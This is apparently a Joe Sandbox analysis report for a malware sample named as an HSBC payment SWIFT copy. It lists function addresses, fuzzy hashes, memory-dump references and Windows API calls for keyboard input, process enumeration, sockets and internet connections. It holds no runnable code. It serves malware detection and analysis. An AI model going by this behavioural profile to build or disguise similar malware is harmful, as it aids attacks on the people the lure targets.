API String ID: 3880355969-0
Opcode ID: c7aa05df7e8949ccfffc859657c95b1351e1fefab0425c5c659607efc0a21567
Instruction ID: 6c6288ec21a773f7205fe80ed732870cf1a5171cd55b8504ad0081de067d0f90
Opcode Fuzzy Hash: c7aa05df7e8949ccfffc859657c95b1351e1fefab0425c5c659607efc0a21567
Instruction Fuzzy Hash: D5514034A00209EFCF10CF54C884AAE7BB5FF96360F148259F9559B2A0D738ED51CB90

Function 00779A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00779AD2
__itow.LIBCMT ref: 00779B03

Part of subcall function 00779D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00779DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00779B6C
__itow.LIBCMT ref: 00779BC3

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: f9f3b9d6e25480ea2b948dbae3013541eed12d58636206cd3e7e4c8fd975ad19
Instruction ID: d549ff660d9e3aaea7d6b332cf8fde3c6c1af0c5f29368aa7e2c45aa7596e185
Opcode Fuzzy Hash: f9f3b9d6e25480ea2b948dbae3013541eed12d58636206cd3e7e4c8fd975ad19
Instruction Fuzzy Hash: 2741B3B0A01218EBDF25DF54D849FFE7BB9EF45750F004069FA09A3291DB789944CBA1

Function 007969AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 007969D1
WSAGetLastError.WSOCK32(00000000), ref: 007969E1

Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00796A45
WSAGetLastError.WSOCK32(00000000), ref: 00796A51

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 6a7123ccc75b0debe4e705b9d91e0bd9965b672a5093afe774ce2d8d8d484057
Instruction ID: 47843c4f6c95f33088e3209c11923677a658788ac85bad9590773acb6e8e88ea
Opcode Fuzzy Hash: 6a7123ccc75b0debe4e705b9d91e0bd9965b672a5093afe774ce2d8d8d484057
Instruction Fuzzy Hash: DB41C375700210AFEB60AF64EC8AF3A77E4DF04B10F48C158FA19AF2C2DA799D008795

Function 0079641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007AF910), ref: 007964A7
_strlen.LIBCMT ref: 007964D9

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: ad628f23cc82b0a3003e5bc1a7258827ce80e0648acdc900b95931d602afe4c6
Instruction ID: 74ba80af74fedd53efc5510a76fbcf274f0c2786c4345bf8c53f639fb0c1dcdd
Opcode Fuzzy Hash: ad628f23cc82b0a3003e5bc1a7258827ce80e0648acdc900b95931d602afe4c6
Instruction Fuzzy Hash: F041C471A00114EFCF14EBA8FC99EAEB7B9AF44310F148255F91997296DB38EE50CB50

Function 0078B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0078B89E
GetLastError.KERNEL32(?,00000000), ref: 0078B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0078B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0078B915

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: b077783006f1a97cc82294c7ac150ee9b99f44aed2bd8050b4b9a19c5104df06
Instruction ID: 325508ebc8f88db4f5bd7412a388057674145eb9d4965f0a24067cc5b79752ac
Opcode Fuzzy Hash: b077783006f1a97cc82294c7ac150ee9b99f44aed2bd8050b4b9a19c5104df06
Instruction Fuzzy Hash: 1E412939600620DFCB10EF55D488A5DBBE1EF8A310F098098ED4A9B362CB38FD41CB95

Function 007A8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007A88DE

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 035fc0fa56b976184a69184b2ac0fc35de4e2e56c1c1f15021de730b80ca51ab
Instruction ID: 015b0a707b7f5d57160882b99f6efdd33c6606c7c0615fb8a8926c770c9f9dff
Opcode Fuzzy Hash: 035fc0fa56b976184a69184b2ac0fc35de4e2e56c1c1f15021de730b80ca51ab
Instruction Fuzzy Hash: 9631F234600108EFEBA09B58CC85BBA37B5FB8B310F544212FA11E61A1CE3CE9809B57

Function 007AAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 007AAB60
GetWindowRect.USER32(?,?), ref: 007AABD6
PtInRect.USER32(?,?,007AC014), ref: 007AABE6
MessageBeep.USER32(00000000), ref: 007AAC57

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 8b5ac7b05ee8b7526cd39370764add9f9431d6eab992a48fc6f655f10fa06e23
Instruction ID: 8bceaeef2f1effcd4f13b95d44861ba63259bd2a532d6aa5b66712ffd76db3bc
Opcode Fuzzy Hash: 8b5ac7b05ee8b7526cd39370764add9f9431d6eab992a48fc6f655f10fa06e23
Instruction Fuzzy Hash: 6C417F70600219EFDB11DF58D884B697BF5FF8A320F1482A9E8159F261D738E845CFA2

Function 00780AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00780B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00780B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00780BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00780BFB

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5e7be5571c34a94f6f1112d8e2b521af8040db9995b9f58aab6fc75be6df96dd
Instruction ID: e890d3bb94f1f8f5c8ff8d0eaa1c7378ab1d2fab8d481ca046b7d76779abe666
Opcode Fuzzy Hash: 5e7be5571c34a94f6f1112d8e2b521af8040db9995b9f58aab6fc75be6df96dd
Instruction Fuzzy Hash: 4E315CB0DC0608AFFF71AB658C09BF9BFA5AB45324F04825AF490521D1C37C895897E5

Function 00780C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00780C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00780C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00780CE1
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00780D33

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 658d66f5f1ce67c0433f1eac005fb616eee592688f738f4121a477a48d800fdb
Instruction ID: ffea89463665f94a2732f3f8bd6c9efaf69bf653d39ab1a05549d1ee64a7fff1
Opcode Fuzzy Hash: 658d66f5f1ce67c0433f1eac005fb616eee592688f738f4121a477a48d800fdb
Instruction Fuzzy Hash: DA315830A80208AEFF70AFA5CC087FEBB66AB85320F04871AE484521D1C33D995997F1

Function 007561C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007561FB
__isleadbyte_l.LIBCMT ref: 00756229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00756257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0075628D

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 94af2bec6a77caf4414708babbbe21221c28f35c8145b1e9acd55a154a5ba088
Instruction ID: b492e88bad5d409e5c8ac43f383a0baebc7fa91ddc4daaeb17f3ccf8524ff56c
Opcode Fuzzy Hash: 94af2bec6a77caf4414708babbbe21221c28f35c8145b1e9acd55a154a5ba088
Instruction Fuzzy Hash: 0C31C03060424AEFDF218F65CC48BBA7BA9FF41312F554128EC64871A1EBB9D954DB90

Function 007A4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007A4F02

Part of subcall function 00783641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078365B
Part of subcall function 00783641: GetCurrentThreadId.KERNEL32 ref: 00783662
Part of subcall function 00783641: AttachThreadInput.USER32(00000000,?,00785005), ref: 00783669

GetCaretPos.USER32(?), ref: 007A4F13
ClientToScreen.USER32(00000000,?), ref: 007A4F4E
GetForegroundWindow.USER32 ref: 007A4F54

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 3315f082b2395857c05332062d2fbe2cfb9ed43e936273e21f513381092b64f1
Instruction ID: 601fa21dfd76d2815cc7c2797eeb107bf6665a4180dbf6eb1213397031c8b764
Opcode Fuzzy Hash: 3315f082b2395857c05332062d2fbe2cfb9ed43e936273e21f513381092b64f1
Instruction Fuzzy Hash: 1E313071D00118AFDB04EFA9D885DEFB7F9EF89300F14446AE515E7201EA799E058BA1

Function 00783C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00783C7A
Process32FirstW.KERNEL32(00000000,?), ref: 00783C88
Process32NextW.KERNEL32(00000000,?), ref: 00783CA8
CloseHandle.KERNEL32(00000000), ref: 00783D52

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 866f10b597be09f640e53113a477d4fcd775465589cbbff436280ce43a0823fe
Instruction ID: cc00649f1ec643f1e3e2487f3af681e15b9239470fa7e835877f1729dafc3a67
Opcode Fuzzy Hash: 866f10b597be09f640e53113a477d4fcd775465589cbbff436280ce43a0823fe
Instruction Fuzzy Hash: A731D171208305DFD304EF54D885EAFBBE8EF85310F40082DF581861A1EB79AA49CBA2

Function 007AC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623

GetCursorPos.USER32(?), ref: 007AC4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0075B9AB,?,?,?,?,?), ref: 007AC4E7
GetCursorPos.USER32(?), ref: 007AC534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0075B9AB,?,?,?), ref: 007AC56E

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: d7ce8b95af0e76a21a926b8ea16988a224ccebaf7733d53396841a3c16c4bbed
Instruction ID: ef757191dcd6d515580ecf4bea323de0f97ffdf15295cb3a0379c1e0f3a7ce6c
Opcode Fuzzy Hash: d7ce8b95af0e76a21a926b8ea16988a224ccebaf7733d53396841a3c16c4bbed
Instruction Fuzzy Hash: 7531A735900058FFCB16CF58C858DEA7BB5EF8A310F144165F9058B261C739AD60DF94

Function 00778656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0077810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00778121
Part of subcall function 0077810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0077812B
Part of subcall function 0077810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0077813A
Part of subcall function 0077810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00778141
Part of subcall function 0077810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00778157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007786A3
_memcmp.LIBCMT ref: 007786C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007786FC
HeapFree.KERNEL32(00000000), ref: 00778703

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 230291bbdb27b1c175a54f4cb09706ef3b8297521815c9e1e41d064b19edd2c3
Instruction ID: 1cac9fd3c82d766d33350d51f8d2a81de8c2c487f6914fdb36f89297f62fa235
Opcode Fuzzy Hash: 230291bbdb27b1c175a54f4cb09706ef3b8297521815c9e1e41d064b19edd2c3
Instruction Fuzzy Hash: B8216B71E80108EBDF10DFA4C949BEEB7B8EF45344F158059E458E7242EB38AE05CBA1

Function 0074098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 007409AE

Part of subcall function 00725A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00787896,?,?,00000000), ref: 00725A2C
Part of subcall function 00725A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00787896,?,?,00000000,?,?), ref: 00725A50

_fprintf.LIBCMT ref: 007409E5
OutputDebugStringW.KERNEL32(?), ref: 00775DBB

Part of subcall function 00744AAA: _flsall.LIBCMT ref: 00744AC3

__setmode.LIBCMT ref: 00740A1A

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 0e3661ed6a73da013aa966e4ab0d6c9eb7d2c7754d6a19e204795211ab5299cb
Instruction ID: 57effa93a02ef80b98269598015dce77b765c64057bb6152e4995e80e5ad0414
Opcode Fuzzy Hash: 0e3661ed6a73da013aa966e4ab0d6c9eb7d2c7754d6a19e204795211ab5299cb
Instruction Fuzzy Hash: 1D112771A04204EFDB04B7B4AC8FAFE77689F46320F648155F204A7182EF7C584257E5

Function 00791767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007917A3

Part of subcall function 0079182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0079184C
Part of subcall function 0079182D: InternetCloseHandle.WININET(00000000), ref: 007918E9

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 044678d8d0a0cebcdb267da6352ce492c5da7bb645dc2eb80013e99fd7802766
Instruction ID: 6de1ee4455788c31e1ab05a47804d52510c194381cd2a7b4a3f3ca687a4179be
Opcode Fuzzy Hash: 044678d8d0a0cebcdb267da6352ce492c5da7bb645dc2eb80013e99fd7802766
Instruction Fuzzy Hash: EF210B31200602BFDF129FA0EC00FBBB7E9FF89710F504429F91196550DB79D821A7A0

Function 00783A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,007AFAC0), ref: 00783A64
GetLastError.KERNEL32 ref: 00783A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00783A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007AFAC0), ref: 00783ADF

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: b6655b126bc8cedfd7516fbd32d5d6d7ab21873126599d2985f90328dee71438
Instruction ID: 0c1a5b281b8e802f0220ccb9e843826373e365ba04d7a2164ccd04d9938284b7
Opcode Fuzzy Hash: b6655b126bc8cedfd7516fbd32d5d6d7ab21873126599d2985f90328dee71438
Instruction Fuzzy Hash: 4D21B174148201CF8314EF28D8858AA7BE8FE56764F108A2EF499C72A1D7399E46CB43

Function 007550E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00755101

Part of subcall function 0074571C: __FF_MSGBANNER.LIBCMT ref: 00745733
Part of subcall function 0074571C: __NMSG_WRITE.LIBCMT ref: 0074573A
Part of subcall function 0074571C: RtlAllocateHeap.NTDLL(01180000,00000000,00000001,00000000,?,?,?,00740DD3,?), ref: 0074575F

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
